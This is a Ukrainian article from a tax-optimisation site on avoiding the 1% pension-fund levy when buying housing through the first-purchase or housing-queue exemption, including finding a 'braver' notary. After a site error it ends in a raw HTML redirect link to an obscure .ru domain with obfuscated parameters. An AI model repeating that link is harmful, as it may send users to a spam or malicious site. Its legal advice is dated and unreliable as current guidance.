Статьи

Пенсійний податок: як можливо не платити збір до пенсійного фонду

 як можливо не платити збір до пенсійного фонду

Усім відомо, що при купівлі нерухомості ви повинні сплачувати до Пенсійного фонду податок у розмірі 1% від вартості об’єкту нерухомості.

Але Закон України «Про збір на обов’язкове пенсійне страхування»  від 26.06.1997 № 400/97-ВР передбачає , що 1% від вартості нерухомості не повинні сплачувати громадяни, які знаходяться в черзі або купують житло вперше. Що правда, лише цією фразою и обмежується все нормативне регулювання віще згаданої можливості.

Пенсійний податок: за яких умов можливо не платити збір до пенсійного фонду при купівлі житла.

И при цьому самим проблемним моментом у використанні цієї можливості є саме слово «вперше». При купівлі житла громадянин просто приносять нотаріусу відповідну довідку з виконкому, де вказується  той факт, що громадянин перебуває на черзі.

І вже на підставі цієї довідки ви звільняєтесь від сплати пенсійного податку до Пенсійного фонду.

Однак ту теж існує не зрозуміле місце. Одна річ, якщо житло що ви купили дозволяє зняти вас із черги. Це можливо лише в тому випадку, якщо нове житло(разом зі старим, якщо таке є) відповідає нормативам площі, що встановлені в Житловому кодексі.

Але якщо купленого житла не вистачає за нормами для зняття з черги що тоді?

В такому випадку не зрозуміло чи звільняється громадянин від сплати податку  при купівлі другої квартири чи ні. Судячи із закону то звільняється, оскільки купівля житла вперше відокремлюється від купівлі його громадянином, що знаходиться в черзі часткою «або». Це означає що річ йде про дві різні підстави для звільнення від сплати пенсійного податку. Але нотаріусу доведеться доказувати можливість та законність таких дій, саме тому  для оформлення другої купівлі житла громадянину, що стоїть на черзі потрібно підшукати нотаріуса який буде «сміливішим».

Більшість нотаріусів взагалі не використовують цю норму, а деякі вимагають довідку з Пенсійного фонду в якій вказано що ви можете не сплачувати податок. Інші  письмову заяву про те, що купівля житла здійснюється вперше.

Спосіб №1 - як можливо не платити збір до пенсійного фонду при купівлі житла.

Найбільш зручний спосіб і практично безпечний спосіб ухилення  від сплати податку це знайти нотаріуса, який погодиться на оформлення угоди зі звільненням від оподаткування на підставі письмової заяви від покупця про те, що він купує житло уперше.

Мінус - можливе подання позову до суду

Спосіб №2 - як можливо не платити збір до пенсійного фонду при купівлі житла

Існує й  інший спосіб. Ви сплачуєте податок до пенсійного фонду, а потім подаєте позов про безпідставне стягнення суми. У такому випаду саме вам доведеться приводить докази що угода була першою.

Мінус - ви повинні сплатити всі витрати пов’язані із судовим засіданням. Ці витрати можуть бути більші ніж сума, яку ви відсуджуєте.

Спосіб №3

Існую і третій спосіб. Намагатися знайти документи, які підтверджують, що угода стосовно купівлі житла відбувається вперше. Але що це за документ не зрозуміло. В якості такого документа пропонується розглядати виписку з держреєстру прав на нерухомість. Одначе він почав вестися лише з 2004 року.

Але в наш час дуже важко реалізувати своє право на звільнення від сплати податку до Пенсійного фонду оскільки не існує визначених законодавством  механізмів, які б допомоги реалізувати це право. Самим зручним на даний час є знайти нотаріуса який погодиться оформити угода на підставі вашої заяви.

Ключевые слова: 

Пенсійний податок, збір до пенсійного фонду, збір на обов’язкове пенсійне страхування
comments powered by HyperComments
Пенсійний податок: як можливо не платити збір до пенсійного фонду | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=REPLA1ePGdF7eUYAEUutW9uiljWJYn1hxcKH%2BHmPltDtpWsN20TICweggLfuTm1AjGjvxfatrx%2BQXYrHF%2Fma%2BT8u2yZrOmIh%2BGhsmTurz%2B0mupMAmyrvwUVZXDY3Guzg2Qc3vDDXCS85rCcNgiEyeJfaycynIjepXC7Wc5Fe8fM%3D&t=nfrm">Click here to proceed</a>. </body>